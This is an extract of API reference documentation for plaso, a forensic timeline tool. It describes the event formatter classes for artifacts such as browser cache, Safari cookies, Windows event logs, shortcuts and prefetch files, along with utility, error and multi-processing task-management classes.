FORMAT_STRING_PIECES = ['']

FORMAT_STRING_SEPARATOR = ' '

FORMAT_STRING_SHORT_PIECES = ['']

GetFormatStringAttributeNames()Retrieves the attribute names in the format string.


Return type set(str)


Parameters





Raises

• RuntimeError – when an invalid format string piece is encountered.

• WrongFormatter – if the event data cannot be formatted by the formatter.

class plaso.formatters.interface.EnumerationEventFormatterHelper(default=None,in-put_attribute=None,out-put_attribute=None,val-ues=None)

Bases: object

Helper for formatting enumeration event data.

defaultdefault value.

Type str

input_attributename of the attribute that contains the enumeration input value.

Type str



output_attributename of the attribute where the enumeration output value should be stored.

Type str

valuesmapping of enumeration input and output values.

Type dict[str, str]

FormatEventValues(event_values)Formats event values using the helper.

Parameters event_values (dict[str, object]) – event values.

class plaso.formatters.interface.EventFormatterBases: object

Base class to format event data using a format string.

Define the (long) format string and the short format string by defining FORMAT_STRING and FOR-MAT_STRING_SHORT. The syntax of the format strings is similar to that of format() where the place holderfor a certain event object attribute is defined as {attribute_name}.

helpersevent formatter helpers.

Type list[EventFormatterHelper]

AddHelper(helper)Adds an event formatter helper.

Parameters helper (EventFormatterHelper) – event formatter helper to add.

DATA_TYPE = 'internal'

FORMAT_STRING = ''

FORMAT_STRING_SHORT = ''

GetFormatStringAttributeNames()Retrieves the attribute names in the format string.


Return type set(str)


Parameters






SOURCE_LONG = ''

SOURCE_SHORT = 'LOG'



class plaso.formatters.interface.EventFormatterHelperBases: object

Base class of helper for formatting event data.

abstract FormatEventValues(event_values)Formats event values using the helper.


class plaso.formatters.interface.FlagsEventFormatterHelper(input_attribute=None,out-put_attribute=None,values=None)

Bases: object

Helper for formatting flags event data.

input_attributename of the attribute that contains the flags input value.

Type str

output_attributename of the attribute where the flags output value should be stored.

Type str

valuesmapping of flags input and output values.

Type dict[str, str]

FormatEventValues(event_values)Formats event values using the helper.


plaso.formatters.logger module

The formatters sub module logger.

plaso.formatters.manager module

This file contains the event formatters manager class.

class plaso.formatters.manager.FormattersManagerBases: object

Class that implements the formatters manager.

classmethod DeregisterFormatter(formatter_class)Deregisters a formatter class.

The formatter classes are identified based on their lower case data type.

Parameters formatter_class (type) – class of the formatter.

Raises KeyError – if formatter class is not set for the corresponding data type.

classmethod GetFormatterObject(data_type)Retrieves the formatter object for a specific data type.



Parameters data_type (str) – data type.

Returns

corresponding formatter or the default formatter if not available.

Return type EventFormatter

classmethod GetMessageStrings(formatter_mediator, event_data)Retrieves the formatted message strings for a specific event.

Parameters



Returns long and short version of the message string.

Return type list[str, str]

classmethod GetUnformattedAttributes(event_data)Retrieves names of the event data attributes that are not formatted.

Parameters event_data (EventData) – event data.

Returns names of the event data attributes that are not formatted.


classmethod ReadFormattersFromDirectory(path)Reads formatters from a directory.

Parameters path (str) – path of directory that contains the formatters configuration files.

Raises KeyError – if formatter class is already set for the corresponding data type.

classmethod ReadFormattersFromFile(path)Reads formatters from a file.

Parameters path (str) – path of file that contains the formatters configuration.


classmethod RegisterFormatter(formatter_class)Registers a formatter class.


Parameters formatter_class (type) – class of the formatter.


classmethod RegisterFormatters(formatter_classes)Registers formatter classes.


Parameters formatter_classes (list[type]) – classes of the formatters.


classmethod Reset()Resets the manager to the hardcoded formatter classes.

This method is used during unit testing.



plaso.formatters.mediator module

The formatter mediator object.

class plaso.formatters.mediator.FormatterMediator(data_location=None)Bases: object

Class that implements the formatter mediator.

DEFAULT_LANGUAGE_IDENTIFIER = 'en-US'

DEFAULT_LCID = 1033

GetWindowsEventMessage(log_source, message_identifier)Retrieves the message string for a specific Windows Event Log source.

Parameters

• log_source (str) – Event Log source, such as “Application Error”.

• message_identifier (int) – message identifier.

Returns message string or None if not available.

Return type str

SetPreferredLanguageIdentifier(language_identifier)Sets the preferred language identifier.

Parameters language_identifier (str) – language identifier string such as “en-US” forUS English or “is-IS” for Icelandic.

Raises

• KeyError – if the language identifier is not defined.

• ValueError – if the language identifier is not a string type.

property lcidpreferred Language Code identifier (LCID).

Type int

plaso.formatters.msiecf module

The Microsoft Internet Explorer (MSIE) Cache Files (CF) event formatters.

class plaso.formatters.msiecf.MsiecfItemFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

Formatter for a MSIECF item event.


Parameters








class plaso.formatters.msiecf.MsiecfLeakFormatterBases: plaso.formatters.msiecf.MsiecfItemFormatter

Formatter for a MSIECF leak item event.

DATA_TYPE = 'msiecf:leak'

FORMAT_STRING_PIECES = ['Cached file: {cached_file_path}', 'Cached file size: {cached_file_size}', '{recovered_string}']

FORMAT_STRING_SHORT_PIECES = ['Cached file: {cached_file_path}']

class plaso.formatters.msiecf.MsiecfRedirectedFormatterBases: plaso.formatters.msiecf.MsiecfItemFormatter

Formatter for a MSIECF leak redirected event.

DATA_TYPE = 'msiecf:redirected'

FORMAT_STRING_PIECES = ['Location: {url}', '{recovered_string}']

FORMAT_STRING_SHORT_PIECES = ['Location: {url}']

class plaso.formatters.msiecf.MsiecfUrlFormatterBases: plaso.formatters.msiecf.MsiecfItemFormatter

Formatter for a MSIECF URL item event.

DATA_TYPE = 'msiecf:url'

FORMAT_STRING_PIECES = ['Location: {url}', 'Number of hits: {number_of_hits}', 'Cached file: {cached_file_path}', 'Cached file size: {cached_file_size}', 'HTTP headers: {http_headers}', '{recovered_string}']

FORMAT_STRING_SHORT_PIECES = ['Location: {url}', 'Cached file: {cached_file_path}']

plaso.formatters.olecf module

The OLE Compound File (OLECF) event formatters.

class plaso.formatters.olecf.OLECFSummaryInfoFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

Formatter for an OLECF Summary Info property set stream event.

DATA_TYPE = 'olecf:summary_info'

FORMAT_STRING_PIECES = ['Title: {title}', 'Subject: {subject}', 'Author: {author}', 'Keywords: {keywords}', 'Comments: {comments}', 'Template: {template}', 'Revision number: {revision_number}', 'Last saved by: {last_saved_by}', 'Total edit time: {total_edit_time}', 'Number of pages: {number_of_pages}', 'Number of words: {number_of_words}', 'Number of characters: {number_of_characters}', 'Application: {application}', 'Security: {security}']

FORMAT_STRING_SHORT_PIECES = ['Title: {title}', 'Subject: {subject}', 'Author: {author}', 'Revision number: {revision_number}']


Parameters








plaso.formatters.safari_cookies module

The Safari Binary cookie event formatter.

class plaso.formatters.safari_cookies.SafariCookieFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

Formatter for a Safari Binary Cookie file entry event.

DATA_TYPE = 'safari:cookie:entry'

FORMAT_STRING_PIECES = ['{url}', '<{path}>', '({cookie_name})', 'Flags: {flags}']

FORMAT_STRING_SHORT_PIECES = ['{url}', '({cookie_name})']


Parameters






plaso.formatters.shell_items module

The shell item event formatter.

class plaso.formatters.shell_items.ShellItemFileEntryEventFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

Formatter for a shell item file entry event.

DATA_TYPE = 'windows:shell_item:file_entry'

FORMAT_STRING_PIECES = ['Name: {name}', 'Long name: {long_name}', 'Localized name: {localized_name}', 'NTFS file reference: {file_reference}', 'Shell item path: {shell_item_path}', 'Origin: {origin}']

FORMAT_STRING_SHORT_PIECES = ['Name: {file_entry_name}', 'NTFS file reference: {file_reference}', 'Origin: {origin}']


Parameters








plaso.formatters.tango_android module

Tango on Android databases formatter.

class plaso.formatters.tango_android.TangoAndroidContactFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

Tango on Android contact event formatter.

DATA_TYPE = 'tango:android:contact'

FORMAT_STRING_PIECES = ['{first_name}', '{last_name}', '{gender}', 'birthday: {birthday}', 'Status: {status}', 'Friend: {is_friend}', 'Request type: {friend_request_type}', 'Request message: {friend_request_message}']

FORMAT_STRING_SHORT_PIECES = ['{first_name}', '{last_name}', 'Status: {status}']


Parameters




Return type tuple[str, str]


plaso.formatters.winevt module

The Windows EventLog (EVT) file event formatter.

class plaso.formatters.winevt.WinEVTFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

Formatter for a Windows EventLog (EVT) record event.

DATA_TYPE = 'windows:evt:record'

FORMAT_STRING_PIECES = ['[{event_identifier} /', '0x{event_identifier:04x}]', 'Source Name: {source_name}', 'Message string: {message_string}', 'Strings: {strings}', 'Computer Name: {computer_name}', 'Severity: {severity}', 'Record Number: {record_number}', 'Event Type: {event_type}', 'Event Category: {event_category}']

FORMAT_STRING_SHORT_PIECES = ['[{event_identifier} /', '0x{event_identifier:04x}]', 'Strings: {strings}']

GetEventTypeString(event_type)Retrieves a string representation of the event type.

Parameters event_type (int) – event type.

Returns description of the event type.

Return type str


Parameters








GetSeverityString(severity)Retrieves a string representation of the severity.

Parameters severity (int) – severity.

Returns description of the event severity.

Return type str

plaso.formatters.winevt_rc module

Windows Event Log resources database reader.

class plaso.formatters.winevt_rc.Sqlite3DatabaseFileBases: object

Class that defines a sqlite3 database file.

Close()Closes the database file.

Raises RuntimeError – if the database is not opened.

GetValues(table_names, column_names, condition)Retrieves values from a table.

Parameters

• table_names (list[str]) – table names.

• column_names (list[str]) – column names.

• condition (str) – query condition such as “log_source == ‘Application Error’”.

Yields sqlite3.row – row.


HasTable(table_name)Determines if a specific table exists.

Parameters table_name (str) – table name.

Returns True if the table exists.

Return type bool


Open(filename, read_only=False)Opens the database file.

Parameters

• filename (str) – filename of the database.

• read_only (Optional[bool]) – True if the database should be opened in read-onlymode. Since sqlite3 does not support a real read-only mode we fake it by only permittingSELECT queries.

Returns True if successful.



Return type bool

Raises RuntimeError – if the database is already opened.

class plaso.formatters.winevt_rc.Sqlite3DatabaseReaderBases: object

Class to represent a sqlite3 database reader.

Close()Closes the database reader object.

Open(filename)Opens the database reader object.

Parameters filename (str) – filename of the database.


Return type bool

class plaso.formatters.winevt_rc.WinevtResourcesSqlite3DatabaseReaderBases: plaso.formatters.winevt_rc.Sqlite3DatabaseReader

Class to represent a sqlite3 Event Log resources database reader.

GetMessage(log_source, lcid, message_identifier)Retrieves a specific message for a specific Event Log source.

Parameters

• log_source (str) – Event Log source.

• lcid (int) – language code identifier (LCID).

• message_identifier (int) – message identifier.

Returns message string or None if not available.

Return type str

GetMetadataAttribute(attribute_name)Retrieves the metadata attribute.

Parameters attribute_name (str) – name of the metadata attribute.

Returns the metadata attribute or None.

Return type str

Raises RuntimeError – if more than one value is found in the database.

Open(filename)Opens the database reader object.

Parameters filename (str) – filename of the database.


Return type bool

Raises RuntimeError – if the version or string format of the database is not supported.



plaso.formatters.winevtx module

The Windows XML EventLog (EVTX) file event formatter.

class plaso.formatters.winevtx.WinEVTXFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

Formatter for a Windows XML EventLog (EVTX) record event.

DATA_TYPE = 'windows:evtx:record'

FORMAT_STRING_PIECES = ['[{event_identifier} /', '0x{event_identifier:04x}]', 'Source Name: {source_name}', 'Message string: {message_string}', 'Strings: {strings}', 'Computer Name: {computer_name}', 'Record Number: {record_number}', 'Event Level: {event_level}']

FORMAT_STRING_SHORT_PIECES = ['[{event_identifier} /', '0x{event_identifier:04x}]', 'Strings: {strings}']


Parameters






plaso.formatters.winlnk module

The Windows Shortcut (LNK) event formatter.

class plaso.formatters.winlnk.WinLnkLinkFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

Formatter for a Windows Shortcut (LNK) link event.

DATA_TYPE = 'windows:lnk:link'

FORMAT_STRING_PIECES = ['[{description}]', 'File size: {file_size}', 'File attribute flags: 0x{file_attribute_flags:08x}', 'Drive type: {drive_type}', 'Drive serial number: 0x{drive_serial_number:08x}', 'Volume label: {volume_label}', 'Local path: {local_path}', 'Network path: {network_path}', 'cmd arguments: {command_line_arguments}', 'env location: {env_var_location}', 'Relative path: {relative_path}', 'Working dir: {working_directory}', 'Icon location: {icon_location}', 'Link target: {link_target}']

FORMAT_STRING_SHORT_PIECES = ['[{description}]', '{linked_path}', '{command_line_arguments}']


Parameters








plaso.formatters.winprefetch module

The Windows Prefetch event formatter.

class plaso.formatters.winprefetch.WinPrefetchExecutionFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

Formatter for a Windows Prefetch execution event.

DATA_TYPE = 'windows:prefetch:execution'

FORMAT_STRING_PIECES = ['Prefetch', '[{executable}] was executed -', 'run count {run_count}', 'path hints: {path_hints}', 'hash: 0x{prefetch_hash:08X}', '{volumes_string}']

FORMAT_STRING_SHORT_PIECES = ['{executable} was run', '{run_count} time(s)']


Parameters






plaso.formatters.winreg module

The Windows Registry key or value event formatter.

class plaso.formatters.winreg.WinRegistryGenericFormatterBases: plaso.formatters.interface.EventFormatter

Formatter for a Windows Registry key or value event.

DATA_TYPE = 'windows:registry:key_value'

FORMAT_STRING = '[{key_path}] {values}'

FORMAT_STRING_ALTERNATIVE = '{values}'


Parameters








plaso.formatters.yaml_formatters_file module

YAML-based formatters file.

class plaso.formatters.yaml_formatters_file.YAMLFormattersFileBases: object

YAML-based formatters file.

A YAML-based formatters file contains one or more event formatters. type: ‘conditional’ data_type: ‘fs:stat’message: - ‘{display_name}’ - ‘Type: {file_entry_type}’ - ‘({unallocated})’ short_message: - ‘{filename}’

Where: * type, defines the formatter data type, which can be “basic” or

“conditional”;

• data_type, defines the corresponding event data type;

• message, defines a list of message string pieces;

• separator, defines the message and short message string pieces separator;

• short_message, defines the short message string pieces;

ReadFromFile(path)Reads the event formatters from the YAML-based formatters file.

Parameters path (str) – path to a formatters file.

Returns event formatters.

Return type list[EventFormatter]

Module contents

This file contains an import statement for each formatter.

5.1.8 plaso.lib package

Submodules

plaso.lib.bufferlib module

Circular buffer for storing event objects.

class plaso.lib.bufferlib.CircularBuffer(size)Bases: object

Class that defines a circular buffer for storing event objects.

Append(item)Add an item to the list.

Parameters item (object) – item.

Clear()Removes all elements from the list.

Flush()Returns a generator for all items and clear the buffer.



GetCurrent()Retrieves the current item that index points to.

Returns item.

Return type object

__iter__()Return all elements from the list.

__len__()Return the length (the fixed size).

property sizenumber of elements in the buffer.

Type int

plaso.lib.decorators module

Function decorators.

plaso.lib.decorators.deprecated(function)Decorator to mark functions or methods as deprecated.

plaso.lib.definitions module

The definitions.

plaso.lib.errors module

This file contains the error classes.

exception plaso.lib.errors.BadConfigObjectBases: plaso.lib.errors.Error

Raised when the configuration object is of the wrong type.

exception plaso.lib.errors.BadConfigOptionBases: plaso.lib.errors.Error

Raised when a faulty configuration option is encountered.

exception plaso.lib.errors.ConnectionErrorBases: plaso.lib.errors.Error

Error connecting to a service.

exception plaso.lib.errors.ErrorBases: Exception

Base error class.

exception plaso.lib.errors.InvalidEventBases: plaso.lib.errors.Error

Error indicating an event is malformed.



exception plaso.lib.errors.InvalidFilterBases: plaso.lib.errors.Error

Error indicating an invalid filter was specified.

exception plaso.lib.errors.InvalidNumberOfOperandsBases: plaso.lib.errors.Error

The number of operands provided to an objectfilter operator is wrong.

exception plaso.lib.errors.MalformedPresetErrorBases: plaso.lib.errors.Error

Raised when a parser preset definition is malformed.

exception plaso.lib.errors.MaximumRecursionDepthBases: plaso.lib.errors.Error

Raised when the maximum recursion depth is reached.

exception plaso.lib.errors.NoFormatterFoundBases: plaso.lib.errors.Error

Raised when no formatter is found for a particular event object.

exception plaso.lib.errors.ParseErrorBases: plaso.lib.errors.Error

Raised when a parse error occurred.

exception plaso.lib.errors.PreProcessFailBases: plaso.lib.errors.Error

Raised when a preprocess module is unable to gather information.

exception plaso.lib.errors.QueueAlreadyClosedBases: plaso.lib.errors.Error

Raised when an attempt is made to close a queue that is already closed.

exception plaso.lib.errors.QueueAlreadyStartedBases: plaso.lib.errors.Error

Raised when an attempt is made to start queue that is already started.

exception plaso.lib.errors.QueueCloseBases: plaso.lib.errors.Error

Class that implements a queue close exception.

exception plaso.lib.errors.QueueEmptyBases: plaso.lib.errors.Error

Class that implements a queue empty exception.

exception plaso.lib.errors.QueueFullBases: plaso.lib.errors.Error

Class that implements a queue full exception.

exception plaso.lib.errors.SerializationErrorBases: plaso.lib.errors.Error

Class that defines serialization errors.



exception plaso.lib.errors.SourceScannerErrorBases: plaso.lib.errors.Error

Class that defines source scanner errors.

exception plaso.lib.errors.TaggingFileErrorBases: plaso.lib.errors.Error

Raised when the tagging file is invalid.

exception plaso.lib.errors.TimestampErrorBases: plaso.lib.errors.Error

Class that defines timestamp errors.

exception plaso.lib.errors.UnableToLoadRegistryHelperBases: plaso.lib.errors.Error

Raised when unable to load a Registry helper object.

exception plaso.lib.errors.UnableToParseFileBases: plaso.lib.errors.Error

Raised when a parser is not designed to parse a file.

exception plaso.lib.errors.UserAbortBases: plaso.lib.errors.Error

Class that defines an user initiated abort exception.

exception plaso.lib.errors.WrongBencodePluginBases: plaso.lib.errors.Error

Error reporting wrong bencode plugin used.

exception plaso.lib.errors.WrongCompoundZIPPluginBases: plaso.lib.errors.Error

Error reporting wrong compound ZIP plugin used.

exception plaso.lib.errors.WrongFormatterBases: plaso.lib.errors.Error

Raised when the formatter is not applicable for a particular event.

exception plaso.lib.errors.WrongPluginBases: plaso.lib.errors.Error

Raised when the plugin is of the wrong type.

exception plaso.lib.errors.WrongQueueTypeBases: plaso.lib.errors.Error

Raised when an unsupported operation is attempted on a queue.

For example, attempting to Pop from a Push-only queue.



plaso.lib.line_reader_file module

Binary line reader file-like object.

class plaso.lib.line_reader_file.BinaryDSVReader(binary_line_reader, delimiter)Bases: object

Basic reader for delimiter separated text files of unknown encoding.

This is used for reading data from text files where the content is unknown, or possibly using a mixed encoding.

__iter__()Iterates over delimiter separates values.

Yields list(bytes) – lines of encoded bytes.

class plaso.lib.line_reader_file.BinaryLineReader(file_object, end_of_line=b'\n')Bases: object

Line reader for binary file-like objects.

end_of_linebyte sequence that separates lines from each other.

Type bytes

MAXIMUM_READ_BUFFER_SIZE = 16777216

__enter__()Enters a with statement.

__exit__(exception_type, value, traceback)Exits a with statement.

__iter__()Returns a line of text.

Yields bytes – line of text.

readline(size=None)Reads a single line of text.

The functions reads one entire line from the file-like object. A trailing end-of-line indicator (newline bydefault) is kept in the byte string (but may be absent when a file ends with an incomplete line). An emptybyte string is returned only when end-of-file is encountered immediately.

Parameters size (Optional[int]) – maximum byte size to read. If present and non-negative, it is a maximum byte count (including the trailing end-of-line) and an incompleteline may be returned.

Returns line of text.

Return type bytes

Raises ValueError – if the specified size is less than zero or greater than the maximum sizeallowed.

readlines(sizehint=None)Reads lines of text.

The function reads until EOF using readline() and return a list containing the lines read.

Parameters sizehint (Optional[int]) – maximum byte size to read. If present, insteadof reading up to EOF, whole lines totalling sizehint bytes are read.

Returns lines of text.



Return type list[bytes]

tell()Retrieves the current offset into the file-like object.

Returns current offset into the file-like object.

Return type int

plaso.lib.loggers module

Logging related classes and functions.

class plaso.lib.loggers.CompressedFileHandler(filename, mode='a', encoding='utf-8')Bases: logging.FileHandler

Compressed file handler for logging.

plaso.lib.loggers.ConfigureLogging(debug_output=False, filename=None, mode='w',quiet_mode=False)

Configures the logging root logger.

Parameters

• debug_output (Optional[bool]) – True if the logging should include debug output.

• filename (Optional[str]) – log filename.

• mode (Optional[str]) – log file access mode.

• quiet_mode (Optional[bool]) – True if the logging should not include informationoutput. Note that debug_output takes precedence over quiet_mode.

plaso.lib.plist module

The plist file object.

class plaso.lib.plist.PlistFileBases: object

Class that defines a plist file.

root_keythe plist root key.

Type dict

GetValueByPath(path_segments)Retrieves a plist value by path.

Parameters path_segments (list[str]) – path segment strings relative to the root of theplist.

Returns The value of the key specified by the path or None.

Return type object

Read(file_object)Reads a plist from a file-like object.

Parameters file_object (dfvfs.FileIO) – a file-like object containing plist data.

Raises



• IOError – if the plist file-like object cannot be read.

• OSError – if the plist file-like object cannot be read.

plaso.lib.specification module

The format specification classes.

class plaso.lib.specification.FormatSpecification(identifier, text_format=False)Bases: object

The format specification.

AddNewSignature(pattern, offset=None)Adds a signature.

Parameters

• pattern (bytes) – pattern of the signature.

• offset (int) – offset of the signature. None is used to indicate the signature has nooffset. A positive offset is relative from the start of the data a negative offset is relativefrom the end of the data.

IsTextFormat()Determines if the format is a text format.

Returns True if the format is a text format, False otherwise.

Return type bool

class plaso.lib.specification.FormatSpecificationStoreBases: object

The store for format specifications.

AddNewSpecification(identifier)Adds a new format specification.

Parameters identifier (str) – format identifier, which should be unique for the store.

Returns format specification.

Return type FormatSpecification

Raises KeyError – if the store already contains a specification with the same identifier.

AddSpecification(specification)Adds a format specification.

Parameters specification (FormatSpecification) – format specification.

Raises KeyError – if the store already contains a specification with the same identifier.

GetSpecificationBySignature(signature_identifier)Retrieves a specification mapped to a signature identifier.

Parameters signature_identifier (str) – unique signature identifier for a specifica-tion store.

Returns

format specification or None if the signature identifier does not exist within the specifica-tion store.




property specificationsspecifications iterator.

Type iterator

class plaso.lib.specification.Signature(pattern, offset=None)Bases: object

The format specification signature.

The signature consists of a byte string pattern, an optional offset relative to the start of the data, and a value toindicate if the pattern is bound to the offset.

SetIdentifier(identifier)Sets the identifier of the signature in the specification store.

Parameters identifier (str) – unique signature identifier for a specification store.

plaso.lib.timelib module

Time manipulation functions and variables.

This module contain common methods that can be used to convert timestamps from various formats into number ofmicroseconds since January 1, 1970, 00:00:00 UTC that is used internally to store timestamps.

It also contains various functions to represent timestamps in a more human readable form.

class plaso.lib.timelib.TimestampBases: object

Class for converting timestamps to Plaso timestamps.

The Plaso timestamp is a 64-bit signed timestamp value containing: microseconds since 1970-01-01 00:00:00.

The timestamp is not necessarily in UTC.

classmethod CopyToIsoFormat(timestamp, timezone=<UTC>, raise_error=False)Copies the timestamp to an ISO 8601 formatted string.

Parameters

• timestamp (int) – a timestamp containing the number of microseconds since January1, 1970, 00:00:00 UTC.

• timezone (Optional[pytz.timezone]) – time zone.

• raise_error (Optional[bool]) – True if an OverflowError should be raised if thetimestamp is out of bounds.

Returns date and time formatted in ISO 8601.

Return type str

Raises

• OverflowError – if the timestamp value is out of bounds and raise_error is True.

• ValueError – if the timestamp value is missing.

classmethod LocaltimeToUTC(timestamp, timezone, is_dst=False)Converts the timestamp in localtime of the timezone to UTC.

Parameters

• timestamp – The timestamp which is an integer containing the number of microsecondssince January 1, 1970, 00:00:00 UTC.



• timezone – The timezone (pytz.timezone) object.

• is_dst – A boolean to indicate the timestamp is corrected for daylight savings time(DST) only used for the DST transition period.

Returns The timestamp which is an integer containing the number of microseconds since Jan-uary 1, 1970, 00:00:00 UTC or 0 on error.

NONE_TIMESTAMP = 0

Module contents

5.1.9 plaso.multi_processing package

Submodules

plaso.multi_processing.analysis_process module

The multi-process analysis process.

class plaso.multi_processing.analysis_process.AnalysisProcess(event_queue,storage_writer,knowledge_base,analysis_plugin,process-ing_configuration,data_location=None,event_filter_expression=None,**kwargs)

Bases: plaso.multi_processing.base_process.MultiProcessBaseProcess

Multi-processing analysis process.

SignalAbort()Signals the process to abort.

plaso.multi_processing.base_process module

Base class for a process used in multi-processing.

class plaso.multi_processing.base_process.MultiProcessBaseProcess(processing_configuration,en-able_sigsegv_handler=False,**kwargs)

Bases: multiprocessing.context.Process

Multi-processing process interface.

rpc_portport number of the process status RPC server.

Type int

abstract SignalAbort()Signals the process to abort.

property nameprocess name.



Type str

run()Runs the process.

plaso.multi_processing.engine module

The multi-process processing engine.

class plaso.multi_processing.engine.MultiProcessEngineBases: plaso.engine.engine.BaseEngine

Multi-process engine base.

This class contains functionality to: * monitor and manage worker processes; * retrieve a process status infor-mation via RPC; * manage the status update thread.

plaso.multi_processing.logger module

The multi-processing sub module logger.

plaso.multi_processing.plaso_xmlrpc module

XML RPC server and client.

class plaso.multi_processing.plaso_xmlrpc.ThreadedXMLRPCServer(callback)Bases: plaso.multi_processing.rpc.RPCServer

Threaded XML RPC server.

Start(hostname, port)Starts the process status RPC server.

Parameters

• hostname (str) – hostname or IP address to connect to for requests.

• port (int) – port to connect to for requests.

Returns True if the RPC server was successfully started.

Return type bool

Stop()Stops the process status RPC server.

class plaso.multi_processing.plaso_xmlrpc.XMLProcessStatusRPCClientBases: plaso.multi_processing.plaso_xmlrpc.XMLRPCClient

XML process status RPC client.

class plaso.multi_processing.plaso_xmlrpc.XMLProcessStatusRPCServer(callback)Bases: plaso.multi_processing.plaso_xmlrpc.ThreadedXMLRPCServer

XML process status threaded RPC server.

class plaso.multi_processing.plaso_xmlrpc.XMLRPCClientBases: plaso.multi_processing.rpc.RPCClient

XML RPC client.



CallFunction()Calls the function via RPC.

Close()Closes the RPC communication channel to the server.

Open(hostname, port)Opens a RPC communication channel to the server.

Parameters



Returns True if the communication channel was established.

Return type bool

plaso.multi_processing.psort module

The psort multi-processing engine.

class plaso.multi_processing.psort.PsortEventHeapBases: object

Psort event heap.

PopEvent()Pops an event from the heap.

Returns

containing:

str: identifier of the event MACB group or None if the event cannot be grouped.

str: identifier of the event content. EventObject: event. EventData: event data. Event-DataStream: event data stream.

Return type tuple

PopEvents()Pops events from the heap.

Yields tuple –

containing:

str: identifier of the event MACB group or None if the event cannot be grouped.

str: identifier of the event content. EventObject: event. EventData: event data. Event-DataStream: event data stream.

PushEvent(event, event_data, event_data_stream)Pushes an event onto the heap.

Parameters






property number_of_eventsnumber of events on the heap.

Type int

class plaso.multi_processing.psort.PsortMultiProcessEngine(worker_memory_limit=None,worker_timeout=None)

Bases: plaso.multi_processing.engine.MultiProcessEngine

Psort multi-processing engine.

AnalyzeEvents(knowledge_base_object, storage_writer, data_location, analysis_plugins, pro-cessing_configuration, event_filter=None, event_filter_expression=None, sta-tus_update_callback=None)

Analyzes events in a plaso storage.

Parameters

• knowledge_base_object (KnowledgeBase) – contains information from thesource data needed for processing.

• storage_writer (StorageWriter) – storage writer.

• data_location (str) – path to the location that data files should be loaded from.

• analysis_plugins (dict[str, AnalysisPlugin]) – analysis plugins thatshould be run and their names.


• event_filter (Optional[FilterObject]) – event filter.

• event_filter_expression (Optional[str]) – event filter expression.


Raises KeyboardInterrupt – if a keyboard interrupt was raised.

ExportEvents(knowledge_base_object, storage_reader, output_module, processing_configuration,deduplicate_events=True, event_filter=None, status_update_callback=None,time_slice=None, use_time_slicer=False)

Exports events using an output module.

Parameters

• knowledge_base_object (KnowledgeBase) – contains information from thesource data needed for processing.

• storage_reader (StorageReader) – storage reader.

• output_module (OutputModule) – output module.


• deduplicate_events (Optional[bool]) – True if events should be dedupli-cated.

• event_filter (Optional[FilterObject]) – event filter.


• time_slice (Optional[TimeSlice]) – slice of time to output.



• use_time_slicer (Optional[bool]) – True if the ‘time slicer’ should be used.The ‘time slicer’ will provide a context of events around an event of interest.

plaso.multi_processing.rpc module

The RPC client and server interface.

class plaso.multi_processing.rpc.RPCClientBases: object

RPC client interface.

abstract CallFunction()Calls the function via RPC.

abstract Close()Closes the RPC communication channel to the server.

abstract Open(hostname, port)Opens a RPC communication channel to the server.

Parameters



Returns True if the communication channel was established.

Return type bool

class plaso.multi_processing.rpc.RPCServer(callback)Bases: object

RPC server interface.

abstract Start(hostname, port)Starts the RPC server.

Parameters



Returns True if the RPC server was successfully started.

Return type bool

abstract Stop()Stops the RPC server.

plaso.multi_processing.task_engine module

The task multi-process processing engine.

class plaso.multi_processing.task_engine.TaskMultiProcessEngine(maximum_number_of_tasks=None,num-ber_of_worker_processes=0,worker_memory_limit=None,worker_timeout=None)

Bases: plaso.multi_processing.engine.MultiProcessEngine



Class that defines the task multi-process engine.

This class contains functionality to: * monitor and manage extraction tasks; * merge results returned by extrac-tion workers.

ProcessSources(session, source_path_specs, storage_writer, processing_configuration, en-able_sigsegv_handler=False, status_update_callback=None)

Processes the sources and extract events.

Parameters

• session (Session) – session in which the sources are processed.


• storage_writer (StorageWriter) – storage writer for a session storage.


• enable_sigsegv_handler (Optional[bool]) – True if the SIGSEGV handlershould be enabled.


Returns processing status.

Return type ProcessingStatus

plaso.multi_processing.task_manager module

The task manager.

class plaso.multi_processing.task_manager.TaskManagerBases: object

Manages tasks and tracks their completion and status.

A task being tracked by the manager must be in exactly one of the following states:

• abandoned: a task assumed to be abandoned because a tasks that has been queued or was process-ing exceeds the maximum inactive time.

• merging: a task that is being merged by the engine.

• pending_merge: the task has been processed and is ready to be merged with the session storage.

• processed: a worker has completed processing the task, but it is not ready to be merged into the ses-sion storage.

• processing: a worker is processing the task.

• queued: the task is waiting for a worker to start processing it. It is also possible that a worker has al-ready completed the task, but no status update was collected from the worker while it processed thetask.

Once the engine reports that a task is completely merged, it is removed from the task manager.

Tasks are considered “pending” when there is more work that needs to be done to complete these tasks. Pendingapplies to tasks that are: * not abandoned; * abandoned, but need to be retried.

Abandoned tasks without corresponding retry tasks are considered “failed” when the foreman is done process-ing.



CheckTaskToMerge(task)Checks if the task should be merged.

Parameters task (Task) – task.

Returns True if the task should be merged.

Return type bool

Raises KeyError – if the task was not queued, processing or abandoned.

CompleteTask(task)Completes a task.

The task is complete and can be removed from the task manager.


Raises KeyError – if the task was not merging.

CreateRetryTask()Creates a task that to retry a previously abandoned task.

Returns

a task that was abandoned but should be retried or None if there are no abandonedtasks that should be retried.

Return type Task

CreateTask(session_identifier, storage_format='sqlite')Creates a task.

Parameters

• session_identifier (str) – the identifier of the session the task is part of.

• storage_format (Optional[str]) – the storage format that the task should bestored in.

Returns task attribute container.

Return type Task

GetFailedTasks()Retrieves all failed tasks.

Failed tasks are tasks that were abandoned and have no retry task once the foreman is done processing.

Returns tasks.

Return type list[Task]

GetProcessedTaskByIdentifier(task_identifier)Retrieves a task that has been processed.

Parameters task_identifier (str) – unique identifier of the task.

Returns a task that has been processed.

Return type Task

Raises KeyError – if the task was not processing, queued or abandoned.

GetStatusInformation()Retrieves status information about the tasks.

Returns tasks status information.



Return type TasksStatus

GetTaskPendingMerge(current_task)Retrieves the first task that is pending merge or has a higher priority.

This function will check if there is a task with a higher merge priority than the current_task being merged.If so, that task with the higher priority is returned.

Parameters current_task (Task) – current task being merged or None if no such task.

Returns

the next task to merge or None if there is no task pending merge or with a higher prior-ity.

Return type Task

HasPendingTasks()Determines if there are tasks running or in need of retrying.

Returns

